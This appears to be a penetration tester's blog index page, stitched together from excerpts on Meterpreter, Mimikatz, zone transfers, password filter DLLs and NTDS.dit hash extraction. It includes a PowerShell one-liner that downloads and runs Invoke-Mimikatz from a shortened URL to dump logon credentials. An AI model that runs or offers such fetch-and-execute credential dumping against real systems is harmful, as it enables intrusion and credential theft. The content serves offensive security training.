Since I’ve been gone, OJ has released the ExtAPI (Extended API) for Meterpreter. This has some pretty amazing functionality. You can find OJ’s write up on it and more amazing things he did in 3 months of meterpreter and on the Metasploit blog. Just brushing the surface and to help people see the power of this new functionality I went ahead and created a few Meterpreter scripts that can really mess with someone.
I’ve taken a rather long hiatus from blogging. This is mostly because I was fed up with the blogging platform that I had (Squarespace) and didn’t really have any alternatives that met all of the features I wanted. So, where am I at now? Github actually. Github allows users to create “Github Pages” for repositories (or be it’s own repo). For the most part these pages are written in Markdown. It’s late and I don’t feel like looking up who, but someone created a project called “Jekyll” which is a Ruby based static page generator and then another project called “Octopress” popped up using Jekyll to create a static html based blogging platform.
Show URL: Hak5 Youtube URL: YouTube Show RSS feed: RSS
clymb3r recently posted a script called “Invoke-Mimikatz.ps1” basically what this does is reflectively injects mimikatz into memory, calls for all the logonPasswords and exits. It even checks the targets architecture (x86/x64) first and injects the correct DLL. You can very easily use this script directly from an admin command prompt as so: powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" (This works REALLY well for Citrix and Kiosk scenarios and it’s too hard to type/remember) This runs the powershell script by directly pulling it from Github and executing it “in memory” on your system.
cross posted from: http://carnal0wnage.attackresearch.com/2013/10/ad-zone-transfers-as-user.html The tired and true method for Zone Transfers are using either nslookup: nslookup ls -d domain.com.local Or dig: dig -t AXFR domain.com.local @ns1.domain.com.local In the Windows Enterprise world there are a few more options. If you are a DNS Admin you can use the ‘dnscmd’ command like so: dnscmd /EnumZones dnscmd /ZonePrint domain.com.local Which is handy if you can pop the DNS server (usually the Domain Controller so you usually have better things to do at that point).
Password Filters .aspx”) are a way for organizations and governments to enforce stricter password requirements on Windows Accounts than those available by default in Active Directory Group Policy. It is also fairly documented on how to Install and Register Password Filters . Basically what it boils down to is updating a registry key here: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages with the name of a DLL (without the extension) that you place in Windows\System32
If you’ve ever used proxychains to push things through Meterpreter, one of the most annoying things is its “hardcoded” DNS setting for 126.96.36.199, if the org that you are going after doesn’t allow this out of their network, or if you are trying to resolve an internal asset, you’re SOL. After a ton of googling and annoyed head slams into walls every time I forget where this is I’ve finally decided to make a note of it.
Saw this post about a kernel bug in 64 bit Windows that is a DoS, it can also create an unkillable process: Blog post: http://waleedassar.blogspot.com/2013/02/kernel-bug-1-processiopriority.html Figured I’d take a swing at making a module that I could put Meterpreter into an unkillable state. Good times at CCDC could be had. Started with the C code for the bug: http://pastebin.com/QejGQXib along with the only resource I could find about the actual function: http://processhacker.
Problems are that everyone does this whole blogging thing in so many different ways. Me, personally? I like to have a client that I can save drafts it, work on things a little bit here and there and then finalize stuff when I’m ready to post. I have a couple dozen of these posts ready and set with final tweaks needed but my blogging software Squarespace up and moved on to “Squarespace 6”.
Part 2, we have the NTDS.dit file and the SYSTEM.hive file. First we need a few tools: From: http://www.ntdsxtract.com/ Download: http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip wget http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip From: http://code.google.com/p/libesedb/ Download: https://googledrive.com/host/0B3fBvzttpiiSN082cmxsbHB0anc/libesedb-alpha-20120102.tar.gz wget https://googledrive.com/host/0B3fBvzttpiiSN082cmxsbHB0anc/libesedb-alpha-20120102.tar.gz Extract the tools: tar zxvf libesedb-alpha-20120102.tar.gz unzip ntdsxtract_v1_0.zip Compile/make libesedb: root@wpad:~/blog/# cd libesedb-20120102 root@wpad:~/blog/libesedb-20120102# ./configure root@wpad:~/blog/libesedb-20120102# make Export the tables from NTDS.dit: root@wpad:~/blog/libesedb-20120102# cd esedbtools/ root@wpad:~/blog/libesedb-20120102/esedbtools# ./esedbexport esedbexport 20120102 Missing source file. Use esedbexport to export items stored in an Extensible Storage Engine (ESE) Database (EDB) file Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ] [ -T table_name ] [ -hvV ] source source: the source file -c: codepage of ASCII strings, options: ascii, windows-874, windows-932, windows-936, windows-1250, windows-1251, windows-1252 (default), windows-1253, windows-1254 windows-1255, windows-1256, windows-1257 or windows-1258 -h: shows this help -l: logs information about the exported items -m: export mode, option: all, tables (default) 'all' exports all the tables or a single specified table with indexes, 'tables' exports all the tables or a single specified table -t: specify the basename of the target directory to export to (default is the source filename) esedbexport will add the suffix .